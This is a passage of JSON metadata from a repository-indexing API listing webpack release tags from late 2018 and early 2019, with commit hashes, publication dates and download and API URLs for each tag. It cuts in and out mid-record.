/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https: